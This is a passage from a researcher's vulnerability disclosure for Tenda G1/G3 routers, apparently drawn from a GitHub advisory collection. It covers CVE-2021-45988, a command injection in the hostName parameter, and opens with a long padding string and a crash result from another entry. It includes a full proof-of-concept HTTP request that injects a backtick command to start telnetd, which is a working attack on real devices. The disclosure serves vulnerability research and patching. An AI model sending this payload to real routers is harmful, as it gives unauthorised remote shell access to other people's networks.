aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_5/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45988: my_vuln/5.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetNetCheckTools. This vulnerability allows attackers to execute arbitrary commands via the hostName parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetNetCheckTools` function, `hostName` is directly passed by the attacker, so we can control the `hostName` to attack the OS.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_3/images/1.png)

As you can see here, in `cmd_get_ping_output` function, the initial input has not checked and cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_3/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

The same problem exists in the `cmd_get_traceroute_output` function.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_3/images/3.png)

**PoC**

We set `hostName` as **`/usr/sbin/telnetd`guest** , and the router will excute it,such as:

POST /goform/setFixTools HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/sysManage/sysTool.html?0.6642106583319981
Cookie: \_:USERNAME:\_=; G3v3\_user=

networkTool=1&hostName=\`/usr/sbin/telnetd\`www.baidu.com&packageNum=1&packageSize=32

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_3/images/4.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_3/images/5.png)

Tag

#ubuntu